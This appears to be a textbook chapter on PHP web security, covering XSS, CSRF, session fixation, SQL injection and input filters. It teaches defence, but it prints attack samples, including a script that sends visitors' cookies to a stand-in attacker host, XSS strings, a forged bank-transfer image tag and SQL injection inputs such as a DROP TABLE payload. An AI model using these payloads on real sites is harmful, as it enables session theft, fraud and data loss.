CHAPTER 11

Security

When programming web pages, it is very important to think about security. There are a lot of potential site vulnerabilities that an attacker will try to exploit. A good PHP developer needs to remain both diligent and current with security practices. In this chapter, we will cover some best practices and techniques to harden our sites.

A key idea of this chapter is to never trust data or the intentions of the user. User data that we need to filter and escape can come from multiple sources, such as URL query strings, form data, the $_COOKIE, $_SESSION, and $_SERVER arrays, and Ajax requests.

We will also go over common attacks and their prevention, covering the following topics:

  • Cross Site Scripting (XSS) prevention by escaping output
  • Cross Site Request Forgery (CSRF) prevention by using hidden form tokens
  • Session fixation prevention by storing the session ID (SID) only in a cookie and regenerating the SID at the start of every page
  • SQL injection prevention using prepared statements and PDO
  • Using the filter extension

We will also discuss how to solidify our php.ini and server settings and cover password-hashing strength.

Never Trust Data

In the television series the X-Files, Fox Mulder famously said, “Trust no one.” When it comes to web programming, we should follow this advice. Assume the worst-case scenario: that all data has been tainted. Cookies, Ajax requests, headers, and form values (even using POST) can all be spoofed or tampered with. Even if users could be completely trusted, we would still want to ensure that form fields are filled out properly and that we prevent malformed data. Therefore, we should filter all input and escape all output. Later in this chapter, we will look at some of the new PHP filter functions that make this process easier.

We will also discuss configuring php.ini for increased security. However, if we write a library of code for use by the general public, then we cannot ensure that the end developer has followed best practices in their php.ini file. For this reason, we should always code defensively, and assume that the php.ini file has not been tightened up.

register_globals

A best practice is to always initialize variables. This is a safeguard against attacks that are made possible when the register_globals directive is turned on in php.ini. With register_globals enabled, $_POST and $_GET variables are registered as global variables within a script. If you append a query string such as "?foobar=3" to a script, PHP creates a global variable with the same name behind the scenes:

$foobar = 3; //register_globals declares this global variable for you.

With register_globals enabled and the URL set to http://foobar.com/login.php?is_admin=true, the script in Listing 11-1 will always grant admin privileges.

Listing 11-1. register_globals Bypassing a Security Check: login.php

<?php
        session_start();

        //$is_admin = $_GET['is_admin']  initialized by register globals
        //$is_admin = true; current value passed in

        if ( user_is_admin( $_SESSION['user'] ) ) {     //makes this check useless
                    $is_admin = true;
        }

        if ( $is_admin ) {          //will always be true
                    //give the user admin privileges
        }
        …
?>

The attacker would have to guess the correct name of the $is_admin variable for the attack to work. Alternatively, if a known library is being used, an attacker can easily find variable names by studying the API or full source code of the library. The key to preventing this type of hack is to initialize all variables, as in Listing 11-2. This ensures that register_globals cannot override existing variables.

Listing 11-2. Initializing Variables to Safeguard Against register_globals Misuse

<?php
        //$is_admin = $_GET['is_admin']  initialized by register globals
        //$is_admin = true; current value passed in
        $is_admin = false;            //defensively set to override
                                      //initial value set by register globals
        if ( user_is_admin( $user ) ) {
                    $is_admin = true;
        }

        if ( $is_admin ) {   //this will only be true now
                            //if the user_is_admin function returns true
                    //give the user admin privileges
        }
        …
?>

Whitelists and Blacklists

We should not use $_GET or $_POST values for include or require function calls. This is because the filenames will be unknown to us. An attacker could attempt to bypass the document root restrictions by prefixing the filename with a string like "../../". For variables inside of include and require calls, we should have a whitelist of acceptable filenames or sanitize the filenames.

Note A whitelist is a list of approved items. Conversely, a blacklist is a list of disallowed items. Whitelists are more rigid than blacklists, because they specify exactly what is approved. Blacklists need constant updating to be effective.

Examples of whitelists are acceptable e-mail addresses, domain names, or HTML tags. Examples of blacklists are disallowed e-mail addresses, domain names, or HTML tags.

Listing 11-3 demonstrates how to accept a whitelist of acceptable filenames.

Listing 11-3. Limiting Include Files by Using a Whitelist of Acceptable Filenames

<?php
        //whitelist of allowed include filenames
        $allowed_includes = array( 'fish.php', 'dogs.php', 'cat.php' );
        if ( isset( $_GET['animal']) ) {
                $animal = $_GET['animal'];
                $animal_file = $animal. '.php';
                if( in_array( $animal_file, $allowed_includes ) ) {
                        require_once($animal_file);
                } else {
                        echo "Error: illegal animal file";
                }
        }
?>

For files that our script opens, the basename function can help to ensure that the files included do not get outside of our document root.
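
As a minimal sketch of this idea, the hypothetical helper below (safe_filename is our own name, not a PHP built-in) uses basename to discard any directory components from a user-supplied name, so that a "../../" prefix cannot move the lookup out of the intended directory. The base directory is an assumption made up for illustration.

```php
<?php
// Hypothetical helper: keep only the final path component of a user-supplied name.
function safe_filename( $user_supplied ) {
    return basename( $user_supplied );
}

// Assumed base directory, for illustration only.
$base_dir = '/var/www/data';

$requested = '../../etc/passwd';
$path = $base_dir . '/' . safe_filename( $requested );

echo $path, "\n"; // /var/www/data/passwd
```

Because basename only strips directory components, it is probably best combined with a whitelist like the one in Listing 11-3 rather than used as the only check.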

For external URLs supplied by the user and retrieved with file_get_contents, we need to filter the filename. We can use the parse_url function to extract the URL and drop the query string, or use FILTER_SANITIZE_URL and FILTER_VALIDATE_URL to ensure a legal URL. We will discuss using filters later in the chapter.
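
One possible way to combine these functions is sketched below. The helper name clean_remote_url and the decision to accept only the http and https schemes are assumptions for this example, not requirements of PHP.

```php
<?php
// Hypothetical helper: accept only syntactically valid http/https URLs and
// return them without the query string. Returns false for anything else.
function clean_remote_url( $url ) {
    // Remove characters that are illegal in a URL, then validate what is left.
    $url = filter_var( $url, FILTER_SANITIZE_URL );
    if ( filter_var( $url, FILTER_VALIDATE_URL ) === false ) {
        return false;
    }

    $parts = parse_url( $url );
    if ( $parts === false || !isset( $parts['scheme'], $parts['host'] ) ) {
        return false;
    }

    // Assumption: only web URLs are acceptable, never file:// or similar.
    $scheme = strtolower( $parts['scheme'] );
    if ( !in_array( $scheme, array( 'http', 'https' ), true ) ) {
        return false;
    }

    // Rebuild the URL from its parts, dropping the query string and fragment.
    $port = isset( $parts['port'] ) ? ':' . $parts['port'] : '';
    $path = isset( $parts['path'] ) ? $parts['path'] : '/';
    return $scheme . '://' . $parts['host'] . $port . $path;
}

var_dump( clean_remote_url( 'http://www.foobar.com/feed?debug=1' ) );
// string(26) "http://www.foobar.com/feed"
var_dump( clean_remote_url( 'file:///etc/passwd' ) );
// bool(false)
```

Only a value that passes such a check would then be handed to file_get_contents.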

Form Data

Most readers are aware that form fields submitted with the HTTP GET method can be altered by modifying the URL query directly. This is usually the desired behavior. For example, the search form of http://stackoverflow.com can be submitted using the query alone. See Listing 11-4.

Listing 11-4. Searching stackoverflow.com by Modifying the URL Query Directly

http://stackoverflow.com/search?q=php+xss

The actual markup of the search form is shown in Listing 11-5.

Listing 11-5. The stackoverflow.com Search Form

<form id="search" method="get" action="/search">
<div>
<input class="textbox" type="text" value="search" size="28" maxlength="140"
 onfocus="if (this.value=='search') this.value = ''" tabindex="1" name="q">
</div>
</form>

The same search results can be obtained via a telnet client using HTTP requests directly, as shown in Listing 11-6.

Listing 11-6. Telnet Commands to Send a GET Request

telnet stackoverflow.com 80
GET /search?q=php+xss HTTP/1.1
Host: stackoverflow.com

A common misconception is that forms using the HTTP POST method are more secure. Though not directly modifiable through the URL query anymore, a user could still directly submit a query through telnet. If the previous form used the POST method, <form id="search" method="post" action="/search">, we could still send a query request directly using a modification of our previous telnet commands.

Listing 11-7. Telnet Commands to Send a POST Request

telnet stackoverflow.com 80
POST /search HTTP/1.1
Host: stackoverflow.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

q=php+xss

As you can see in Listing 11-7, the actual form markup is unnecessary. If we know the structure of the POST variables expected, we can send them along in a POST request. If an attacker is listening in on network traffic, they can easily see the form content being communicated back and forth. They can then attempt to spoof the form by repopulating it with valid values and submitting it. One way to eliminate form spoofing is to check that a hidden form token has been sent by the server along with the request. This will be covered later in this chapter, in the section “Cross-Site Request Forgery (CSRF).”

Note The hidden form token is known as a nonce, which is an abbreviation of "number used once." The token is different with each form submission, in order to prevent an unauthorized eavesdropper from resending valid data, such as a password. Without the hidden token, the server will reject the form submission data.

When the form data contains very sensitive information, such as a username and password for a bank, then communication should be done over Secure Sockets Layer (SSL) or its successor, Transport Layer Security (TLS). Encrypting the connection prevents eavesdroppers from reading the network traffic.

$_COOKIE, $_SESSION, and $_SERVER

We cannot trust data in $_COOKIE to contain legitimate values, because the cookie data is stored on the client side and can be easily modified. Cookies are also vulnerable to cross-site scripting attacks, which we will discuss later in the chapter. For these reasons, we should use server-side $_SESSION data for any sensitive data. Although much more secure than cookies, sessions are susceptible to session fixation attacks. We will discuss prevention of session fixation later in the chapter as well. Even the $_SERVER variables should not be completely trusted. $_SERVER variables are generated by the server and not PHP. The variables that start with HTTP_ are from HTTP headers and can be easily spoofed.

Ajax Requests

In Ajax, which is discussed in depth in Chapter 15, an XMLHttpRequest object commonly sends an X-Requested-With header, like so:

<script type='text/javascript'>
        …
        xmlHttpRequest.setRequestHeader("X-Requested-With", "XMLHttpRequest");
        …
</script>

In a PHP script, a common technique to ensure that a request came from Ajax is to check for this header with:

<?php
        …
        if ( isset( $_SERVER['HTTP_X_REQUESTED_WITH'] ) &&
             strtolower( $_SERVER['HTTP_X_REQUESTED_WITH'] ) == 'xmlhttprequest' ) {
                //then it was an ajax request
        }
        …
?>

The header can be spoofed, however, so this does not guarantee that an Ajax request was sent.

Common Attacks

In this section we will discuss the two most prevalent attacks, XSS and CSRF, and show how to prevent them.

Same Origin Policy

As a prerequisite to learning about common attacks, we need to discuss the same origin policy. The same origin policy is a security restriction that browsers enforce on client-side scripts, like JavaScript. It allows a script to access functions and elements only on pages served from the same protocol, host, and port. If any one of these differs, then the script is prevented from accessing the other resource. Some attacks occur because the same origin policy is illegitimately circumvented to exploit a user or website.

Note Unfortunately, the same origin policy prevents some legitimate uses. For instance, all of the following would be illegal:

Different protocol
http://www.foobar.com
https://www.foobar.com

Different port
http://www.foobar.com:80
http://www.foobar.com:81

Different subdomain
http://www.foobar.com
http://foobar.com
http://sub.foobar.com

In HTML 5, the postMessage function will enable legitimate situations like these. At the moment, there is limited browser support for this function.
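
To make the comparison concrete, here is a rough PHP sketch of the rule a browser applies. The helper names url_origin and same_origin are hypothetical, and the default ports of 80 for http and 443 for https are filled in by hand. Real browsers implement this check themselves; the code only illustrates the logic.

```php
<?php
// Hypothetical helper: reduce a URL to its (protocol, host, port) triple.
function url_origin( $url ) {
    $parts  = parse_url( $url );
    $scheme = isset( $parts['scheme'] ) ? strtolower( $parts['scheme'] ) : '';
    $host   = isset( $parts['host'] ) ? strtolower( $parts['host'] ) : '';

    // Use the explicit port if given, otherwise the scheme's default port.
    $default_ports = array( 'http' => 80, 'https' => 443 );
    if ( isset( $parts['port'] ) ) {
        $port = $parts['port'];
    } elseif ( isset( $default_ports[$scheme] ) ) {
        $port = $default_ports[$scheme];
    } else {
        $port = null;
    }
    return array( $scheme, $host, $port );
}

// Two URLs share an origin only if all three parts are identical.
function same_origin( $a, $b ) {
    return url_origin( $a ) === url_origin( $b );
}

var_dump( same_origin( 'http://www.foobar.com', 'https://www.foobar.com' ) );      // bool(false)
var_dump( same_origin( 'http://www.foobar.com:80', 'http://www.foobar.com:81' ) ); // bool(false)
var_dump( same_origin( 'http://www.foobar.com', 'http://foobar.com' ) );           // bool(false)
var_dump( same_origin( 'http://www.foobar.com/a', 'http://www.foobar.com:80/b' ) ); // bool(true)
```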

Cross Site Scripting (XSS)

Cross Site Scripting (XSS) is an attack where a client-side script, like JavaScript, Jscript, or VBScript, is injected into a web page. XSS works by bypassing the same origin policy and can only occur when you are outputting data into the browser. For this reason, it is very important to escape all outputted user data.

Note Escaping output refers to removing or substituting potentially dangerous output. Depending on the context, this can include prepending escape characters to quotes (" becomes \"), replacing < and > signs with their HTML entities, &lt; and &gt;, and removing <script> tags.

XSS attacks exploit a user's trust in a site. An XSS attack commonly steals cookies. The implanted script reads document.cookie from the trusted site and then sends the data to the malicious site. With XSS, client side scripts are the enemy. As soon as an attacker finds a way to inject an unescaped client side script onto the outputted page, they have won the proverbial battle.

What XSS Attacks Look Like

Any place that a user can input JavaScript (or another script) without it being filtered and escaped when redisplayed is vulnerable to XSS. This commonly occurs in the following:

  • Comments or guest books.

Listing 11-8. An Unescaped User Comment That Opens an Alert Box When Anyone Visits the Page

<script type="text/javascript">alert('XSS attack');</script>

or

Listing 11-9. An Unescaped Comment That Reads a Visitor's Cookies and Transfers Them to an Attacker's Site

<script type="text/javascript">
document.location = 'http://attackingSite.com/cookieGrabber.php?cookies='
                                 + document.cookie
</script>

  • PHP forms that are not filtered and escaped when redisplayed. This could be in a log-in, sign-up, or search form.

Consider a form that populates field values using $_POST data. When the form is submitted incompletely, then the previous values fill the input fields. This is a common technique used to maintain state with forms. It enables a user to not have to reenter each field value if they input an illegal value or miss a required field. Consider the PHP script shown in Listing 11-10.

Listing 11-10. Sticky Form Handling with PHP. No Output Escaping, So Susceptible to XSS

<?php

$field_1 = "";
$field_2 = "";
if ( isset( $_POST['submit'] ) ) {
    $form_fields = array( 'field_1', 'field_2' );
    $completed_form = true;
    foreach ( $form_fields as $field ) {
        if ( !isset( $_POST[$field] ) || trim( $_POST[$field] ) == "" ) {
            $completed_form = false;
            break;
        }else{
            ${$field} = $_POST[$field];
        }
    }

    if ( $completed_form ) {
        //do something with values and redirect
        header( "Location: success.php" );
    } else {
        print "<h2>error</h2>";
    }
}
?>
<form action="listing_11_10.php" method="post">
    <input type="text" name="field_1" value="<?php print $field_1; ?>" />
    <input type="text" name="field_2" value="<?php print $field_2; ?>" />
    <input type="submit" name="submit" />
</form>

If we input into field_1 the value:

"><script type="text/javascript">alert('XSS attack');</script><"

and nothing into field_2, then our submitted form will fail our validation check. The form will redisplay with our unescaped sticky values. The generated markup will now look like Listing 11-11.

Listing 11-11. The Interpolated Markup with XSS Exploit

<form action="listing_11_10.php" method="post">
    <input type="text" name="field_1" value=""><script type="text/javascript">alert('XSS attack');</script><"" />
    <input type="text" name="field_2" value="" />
    <input type="submit" name="submit" />
</form>

The attacker has been able to insert JavaScript onto the page. We can prevent this by escaping the variables that we will output:

${$field} = htmlspecialchars( $_POST[$field], ENT_QUOTES, "UTF-8" );

This gets rid of the threat, producing the harmless markup shown in Listing 11-12.

Listing 11-12. Interpolated Markup Made Harmless by Escaping Output with htmlspecialchars

<form action="listing_11_10.php" method="post">
    <input type="text" name="field_1" value="&quot;&gt;&lt;script type=&quot;text/javascript&quot;&gt;alert(&#039;XSS attack&#039;);&lt;/script&gt;&lt;&quot;" />
    <input type="text" name="field_2" value="" />
    <input type="submit" name="submit" />
</form>

  • URL query string variables can easily be abused if not filtered and escaped on output. Consider this URL with query string:

http://www.foobar.com?user=<script type="text/javascript">alert('XSS attack');</script>

and the PHP code

<?php
echo "Information for user: ".$_GET['user'];
?>

Preventing XSS Attacks

To prevent XSS, we need to escape any output data that the user could inject malicious code into. This includes form values, $_GET query variables, and guestbook and comment posts that could contain HTML markup.

To escape HTML from an output string, $our_string, we can use the function

htmlspecialchars( $our_string, ENT_QUOTES, 'UTF-8' )

We can also use filter_var( $our_string, FILTER_SANITIZE_STRING ), although this filter is deprecated as of PHP 8.1. We will discuss the filter_var functions in more detail later in the chapter. To prevent XSS while allowing more freedom in outputted data, the PHP library HTML Purifier is one of the most popular options. HTML Purifier can be found at http://htmlpurifier.org/.
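
As a small illustration, the htmlspecialchars call can be wrapped in a short helper so that it is easy to apply at every point of output. The function name e is our own choice here, not part of PHP.

```php
<?php
// Hypothetical helper: escape a value for output inside HTML.
function e( $value ) {
    return htmlspecialchars( $value, ENT_QUOTES, 'UTF-8' );
}

// Stand-in for a hostile $_GET['user'] value.
$user = '<script type="text/javascript">alert(\'XSS attack\');</script>';

echo 'Information for user: ' . e( $user ), "\n";
// Information for user: &lt;script type=&quot;text/javascript&quot;&gt;alert(&#039;XSS attack&#039;);&lt;/script&gt;
```

The browser now displays the script as text instead of running it.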

Cross-Site Request Forgery (CSRF)

CSRF is the opposite of XSS in that it exploits a site's trust in a user. CSRF involves a forged HTTP request and commonly occurs within an img tag.

An Example CSRF Attack

Imagine that a user visits a website containing the following markup:

<img src="http://attackedbank.com/transfer.php?from_user=victim&amount=1000&to_user=attacker"/>

The URL in the src attribute is visited by the browser with the intention of fetching an image. Instead, a PHP page with query string is visited. If the user has been to attackedbank.com recently and still has cookie data for the site, then the request could go through. More complicated attacks spoof the POST method using direct HTTP requests. For the attacked website, the difficulty with CSRF is that it cannot easily distinguish forged requests from valid ones.

CSRF Prevention

The most common technique used to prevent CSRF is to generate and store a secret session token when the session ID is generated, as shown in Listing 11-13. Then the secret token is included as a hidden form field. When the form is submitted, we ensure that the token is present and matches the value found in our session. We also ensure that the form was submitted within a specified time period.

Listing 11-13. A Sample Form with Hidden Token

<?php

session_start();
session_regenerate_id();
if ( !isset( $_SESSION['csrf_token'] ) ) {
  $csrf_token = sha1( uniqid( rand(), true ) );
  $_SESSION['csrf_token'] = $csrf_token;
  $_SESSION['csrf_token_time'] = time();
}
?>

<form>
<input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>" />

</form>

We then validate that the secret token value matches and the generation time is within a specified range (see Listing 11-14).

Listing 11-14. Validating That the Secret Token Value Matches

<?php

session_start();
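//both tokens must be present; two missing values would otherwise compare as equal
if ( isset( $_POST['csrf_token'], $_SESSION['csrf_token'] )
     && $_POST['csrf_token'] === $_SESSION['csrf_token'] ) {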
  $csrf_token_age = time() - $_SESSION['csrf_token_time'];
    
  if ( $csrf_token_age <= 180 ) { //three minutes
       //valid, process request
  }
}
?>
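
On newer PHP versions, the same idea can be sketched with stronger building blocks. The example below assumes PHP 7 or later for random_bytes (hash_equals requires PHP 5.6 or later). The helper names csrf_new_token and csrf_token_is_valid are hypothetical. The timestamps are passed in as plain arguments rather than read from $_SESSION so that the logic can be tried on its own.

```php
<?php
// Hypothetical helper: create an unpredictable token of 64 hex characters.
function csrf_new_token() {
    return bin2hex( random_bytes( 32 ) );
}

// Hypothetical helper: check a submitted token against the stored one and
// reject tokens that are older than $max_age seconds.
function csrf_token_is_valid( $submitted, $stored, $issued_at, $now, $max_age = 180 ) {
    if ( !is_string( $submitted ) || !is_string( $stored ) || $stored === '' ) {
        return false; // a missing token never validates
    }
    if ( !hash_equals( $stored, $submitted ) ) {
        return false; // timing-safe comparison failed
    }
    return ( $now - $issued_at ) <= $max_age;
}

$token     = csrf_new_token();
$issued_at = 1000; // stand-in for the time() value saved with the token

var_dump( csrf_token_is_valid( $token, $token, $issued_at, 1060 ) );   // bool(true)
var_dump( csrf_token_is_valid( 'forged', $token, $issued_at, 1060 ) ); // bool(false)
var_dump( csrf_token_is_valid( $token, $token, $issued_at, 1300 ) );   // bool(false), older than 180 seconds
var_dump( csrf_token_is_valid( null, null, $issued_at, 1060 ) );       // bool(false)
```

In a real script, $stored and $issued_at would come from $_SESSION, $submitted from $_POST, and $now from time().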

Sessions

Session fixation occurs when one person sets another person's session identifier (SID). A common way to do this is using XSS to write a SID to a user's cookies. Session IDs might be retrieved in the URL (e.g., /index.php?PHPSESSID=1234abcd) or can be listened for in the network traffic by an attacker.

To safeguard against session fixation, we can regenerate the session at the start of every script and set directives in our php.ini.

In our PHP files, we can replace the session ID with a new one, but keep the current session data. See Listing 11-15.

Listing 11-15. Replacing the Session ID at the Start of Every Script

<?php

session_start();
session_regenerate_id();

In our php.ini file, we can require that the SID be stored only in a cookie. This also prevents the SID from appearing in the URL.

session.use_cookies = 1
session.use_only_cookies = 1
session.use_trans_sid = 0

Note The session.gc_maxlifetime directive relies on garbage collection. For more consistency, keep track of the session start time yourself and expire it after a specified time period.

To prevent session fixation, we can also store the values of some $_SERVER information, namely REMOTE_ADDR, HTTP_USER_AGENT and HTTP_REFERER. We then recheck these fields at the start of every script execution and compare the values for consistency. If the stored and actual values differ and we suspect tampering of the session, we can destroy it with session_destroy();.
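
A minimal sketch of this consistency check follows. The helper names client_fingerprint and session_is_consistent are hypothetical, and for brevity only REMOTE_ADDR and HTTP_USER_AGENT are combined. Plain arrays stand in for $_SESSION and $_SERVER so that the logic can be run outside a web request.

```php
<?php
// Hypothetical helper: combine request details into one comparable value.
function client_fingerprint( array $server ) {
    $ip    = isset( $server['REMOTE_ADDR'] ) ? $server['REMOTE_ADDR'] : '';
    $agent = isset( $server['HTTP_USER_AGENT'] ) ? $server['HTTP_USER_AGENT'] : '';
    return hash( 'sha256', $ip . '|' . $agent );
}

// Hypothetical helper: remember the fingerprint on the first request and
// compare against it on every later request.
function session_is_consistent( array &$session, array $server ) {
    $current = client_fingerprint( $server );
    if ( !isset( $session['fingerprint'] ) ) {
        $session['fingerprint'] = $current;
        return true;
    }
    return $session['fingerprint'] === $current;
}

$session = array(); // stand-in for $_SESSION
$first   = array( 'REMOTE_ADDR' => '192.0.2.128', 'HTTP_USER_AGENT' => 'BrowserA' );
$other   = array( 'REMOTE_ADDR' => '192.0.2.128', 'HTTP_USER_AGENT' => 'BrowserB' );

var_dump( session_is_consistent( $session, $first ) ); // bool(true), fingerprint stored
var_dump( session_is_consistent( $session, $first ) ); // bool(true), same client
var_dump( session_is_consistent( $session, $other ) ); // bool(false), user agent changed

// In a real script, after session_start():
// if ( !session_is_consistent( $_SESSION, $_SERVER ) ) { session_destroy(); }
```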

One final safeguard is to encrypt session data server-side. This makes compromised session data worthless to anyone without the decryption key.

Preventing SQL Injection

SQL injection can occur when input data is not escaped before being inserted into a database query. Whether malicious or not, SQL injection affects a database in ways that the query was not intended to. A classic example of SQL injection is on the query string:

$sql = "SELECT * FROM BankAccount WHERE username = '{$_POST['user'] }'";

If an attacker can correctly guess or determine (through displayed error or debugging output) database table field name(s) corresponding to form input(s), then injection is possible. For instance, setting the form field "user" to "foobar' OR username = 'foobar2", without escaping the data on submit, has the result of being interpolated as:

$sql = "SELECT * FROM BankAccount WHERE username = 'foobar' OR username = 'foobar2'";

This allows the attacker to view information from two different accounts.

An even bigger injection would be the input string "foobar' OR username = username"

which would be interpolated as

$sql = "SELECT * FROM BankAccount WHERE username ='foobar' OR username = username";

Because "username = username" is always true, the entire WHERE clause will always evaluate to true. The query will return all of the records from the BankAccount table.

Still, other injections could alter or delete data. Consider the query:

$sql = "SELECT * FROM BankAccount WHERE id = {$_POST['id']} ";

and a $_POST value of:

$_POST['id']= "1; DROP TABLE `BankAccount`;"

Without escaping the variable, this is interpolated as:

"SELECT * FROM BankAccount WHERE id = 1; DROP TABLE `BankAccount`;"

which will drop the BankAccount table.

If you can, you should use placeholders, such as those found in PHP Data Objects (PDO). From a security perspective, PDO allows placeholders, prepared statements, and binding data. Consider the three variations of a query with PDO shown in Listing 11-16.

Listing 11-16. Three Different Ways to Execute the Same Query in PDO

<?php
//No placeholders. Susceptible to SQL injection
$stmt = $pdo_dbh->query( "SELECT * FROM BankAccount WHERE username = '{$_POST['username']}' " );  

//Unnamed placeholders.  
$stmt = $pdo_dbh->prepare( "SELECT * FROM BankAccount WHERE username = ? " );  
$stmt->execute( array( $_POST['username'] ) );

//Named placeholders.
$stmt = $pdo_dbh->prepare( "SELECT * FROM BankAccount WHERE username = :user " );  
$stmt->bindParam(':user', $_POST['username']);
$stmt->execute( );
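
To see a placeholder neutralize the injection string from earlier in this section, here is a self-contained sketch. It assumes the pdo_sqlite driver is available and uses an in-memory SQLite database with a made-up two-column BankAccount table. The helper find_accounts is hypothetical.

```php
<?php
// Assumption: the pdo_sqlite driver is installed. The table layout is invented for the demo.
$pdo = new PDO( 'sqlite::memory:' );
$pdo->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION );
$pdo->exec( "CREATE TABLE BankAccount ( username TEXT, balance INTEGER )" );
$pdo->exec( "INSERT INTO BankAccount VALUES ( 'foobar', 100 )" );
$pdo->exec( "INSERT INTO BankAccount VALUES ( 'foobar2', 200 )" );

// Hypothetical helper: look up usernames with a named placeholder.
function find_accounts( PDO $pdo, $username ) {
    $stmt = $pdo->prepare( "SELECT username FROM BankAccount WHERE username = :user" );
    $stmt->execute( array( ':user' => $username ) );
    return $stmt->fetchAll( PDO::FETCH_COLUMN );
}

// A normal lookup returns the one matching row.
var_dump( find_accounts( $pdo, 'foobar' ) );

// The injection attempt is treated as a literal (nonexistent) username,
// so no rows are returned.
var_dump( find_accounts( $pdo, "foobar' OR username = username" ) );
```

Because the value is bound separately from the SQL text, the quote characters in the input never become part of the query itself.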

PDO also provides the quote function, which quotes and escapes a single string value (not an entire query) for use in a SQL statement:

$safer_value = $pdo_dbh->quote( $raw_unsafe_value );

If you are not using PDO, then there are alternatives to the quote function. For MySQL databases, use the mysql_real_escape_string function (or mysqli_real_escape_string in PHP 7 and later, where the original mysql extension has been removed). For PostgreSQL databases, use the pg_escape_string and pg_escape_bytea functions. To use either the MySQL or PostgreSQL escape functions, you need to have the appropriate library enabled in php.ini. If mysql_real_escape_string is not an available option, use the addslashes function. Keep in mind that mysql_real_escape_string handles character encoding issues and binary data better than addslashes, and is generally safer.

The Filter Extension

The filter extension was added in PHP 5.2. The filter extension and filter_var function were touched upon in Chapter 6 - Form Design, but we will go into more depth in this chapter, showing optional FILTER_FLAGS. The filters found in the extension are either for validation or sanitization. Validation filters return the input string if it is valid or false if it is not. Sanitization filters remove illegal characters and return the modified string.

The filter extension has two php.ini directives, filter.default and filter.default_flags, which default to:

filter.default = unsafe_raw
filter.default_flags = NULL

The filter.default directive is applied to all of the superglobal variables $_GET, $_POST, $_COOKIE, $_SERVER, and $_REQUEST. The unsafe_raw sanitization filter does nothing by default. However, you can set the following flags:

FILTER_FLAG_STRIP_LOW   //strip ASCII values smaller than 32 (non printable characters)
FILTER_FLAG_STRIP_HIGH  //strip ASCII values larger than 127 (extended ASCII)
FILTER_FLAG_ENCODE_LOW  //encode values smaller than 32
FILTER_FLAG_ENCODE_HIGH //encode values larger than 127
FILTER_FLAG_ENCODE_AMP  //encode & as &amp;
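
The same flags can also be passed to filter_var directly. The short sketch below uses a made-up input string to show that FILTER_UNSAFE_RAW leaves a value untouched on its own, but strips nonprintable characters once FILTER_FLAG_STRIP_LOW is added.

```php
<?php
// Made-up input containing a control character (\x01) and a newline.
$raw = "abc\x01def\n";

// Without flags, unsafe_raw returns the value unchanged.
$unchanged = filter_var( $raw, FILTER_UNSAFE_RAW );
var_dump( $unchanged === $raw ); // bool(true)

// With FILTER_FLAG_STRIP_LOW, characters with values below 32 are removed.
$clean = filter_var( $raw, FILTER_UNSAFE_RAW, FILTER_FLAG_STRIP_LOW );
var_dump( $clean ); // string(6) "abcdef"
```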

The validation filters are FILTER_VALIDATE_type where type is one of {BOOLEAN, EMAIL, FLOAT, INT, IP, REGEXP and URL}.

We can make the validation filters more restrictive by passing FILTER_FLAGS into the third parameter. A list of all validation filters cross-referenced with optional flags is available at www.php.net/manual/en/filter.filters.validate.php, and flags cross-referenced with filters are available at www.php.net/manual/en/filter.filters.flags.php.

When using FILTER_VALIDATE_IP, there are four optional flags:

FILTER_FLAG_IPV4                //only IPv4 accepted, ex 192.0.2.128
FILTER_FLAG_IPV6                //only IPv6 accepted, ex ::ffff:192.0.2.128
                                //2001:0db8:85a3:0000:0000:8a2e:0370:7334.
FILTER_FLAG_NO_PRIV_RANGE       //private ranges fail
                                //IPv4: 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16 and
                                //IPv6 starting with FD or FC
FILTER_FLAG_NO_RES_RANGE        //reserved ranges fail
                                //IPv4: 0.0.0.0/8, 169.254.0.0/16,
                                //192.0.2.0/24 and 224.0.0.0/4.
                                //IPv6: does not apply

Listing 11-17. Using Filter Flags with FILTER_VALIDATE_IP

<?php
$ip_address = "192.0.2.128"; //IPv4 address
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 ) );
//192.0.2.128
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) );
//false

$ip_address = "::ffff:192.0.2.128"; //IPv6 address representation of 192.0.2.128
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 ) );
//false
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) );
//::ffff:192.0.2.128


$ip_address = "2001:0db8:85a3:0000:0000:8a2e:0370:7334";
var_dump( filter_var($ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) );
// 2001:0db8:85a3:0000:0000:8a2e:0370:7334

$ip_address = "2001:0db8:85a3:0000:0000:8a2e:0370:7334";
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE ) );
//2001:0db8:85a3:0000:0000:8a2e:0370:7334

$ip_address = "FD01:0db8:85a3:0000:0000:8a2e:0370:7334";
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE ) );
//false

$ip_address = "192.0.3.1";
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_RES_RANGE ) );
//192.0.3.1

$ip_address = "192.0.2.1";
var_dump( filter_var( $ip_address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_RES_RANGE ) );
//false
?>

For FILTER_VALIDATE_URL there are only two optional flags, which are:

FILTER_FLAG_PATH_REQUIRED              //http://www.foobar.com/path
FILTER_FLAG_QUERY_REQUIRED             //http://www.foobar.com/path?query=something

<?php
$url_address = "http://www.brian.com";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_PATH_REQUIRED ) );
//false

$url_address = "http://www.brian.com/index";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_PATH_REQUIRED ) );
//"http://www.brian.com/index"

$url_address = "http://www.brian.com/index?q=hey";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_PATH_REQUIRED ) );
//http://www.brian.com/index?q=hey

$url_address = "http://www.brian.com";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_QUERY_REQUIRED ) );
//false

$url_address = "http://www.brian.com/index";
var_dump( filter_var( $url_address, FILTER_VALIDATE_URL, FILTER_FLAG_QUERY_REQUIRED ) );
//false

$url_address = "http://www.brian.com/index?q=hey";
